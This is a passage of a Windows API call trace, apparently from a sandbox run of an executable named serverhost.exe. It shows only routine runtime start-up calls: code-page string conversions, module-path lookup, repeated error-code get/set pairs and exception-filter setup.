| out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ-\x03§F\x84ù\x16", lpUsedDefaultChar=0x0) returned 256 [0085.475] GetLastError () returned 0x7f [0085.475] SetLastError (dwErrCode=0x7f) [0085.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f848, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f848, cbMultiByte=256, lpWideCharStr=0x16f198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0085.475] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0085.475] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16ef88, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0085.475] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x16f648, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ-\x03§F\x84ù\x16", lpUsedDefaultChar=0x0) returned 256 [0085.475] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x416530, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.475] GetLastError () returned 0x0 [0085.475] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.476] SetLastError (dwErrCode=0x0) [0085.476] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.477] SetLastError (dwErrCode=0x0) [0085.477] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.478] SetLastError (dwErrCode=0x0) [0085.478] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.479] SetLastError (dwErrCode=0x0) [0085.479] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.480] SetLastError (dwErrCode=0x0) [0085.480] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.486] SetLastError (dwErrCode=0x0) [0085.486] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.487] GetLastError () returned 0x0 [0085.487] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.488] SetLastError (dwErrCode=0x0) [0085.488] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.489] SetLastError (dwErrCode=0x0) [0085.489] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.490] SetLastError (dwErrCode=0x0) [0085.490] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.491] GetLastError () returned 0x0 [0085.491] SetLastError (dwErrCode=0x0) [0085.493] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0085.493] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4071c2) returned 0x0 [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.493] SetLastError (dwErrCode=0x0) [0085.493] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.494] SetLastError (dwErrCode=0x0) [0085.494] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.495] GetLastError () returned 0x0 [0085.495] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] 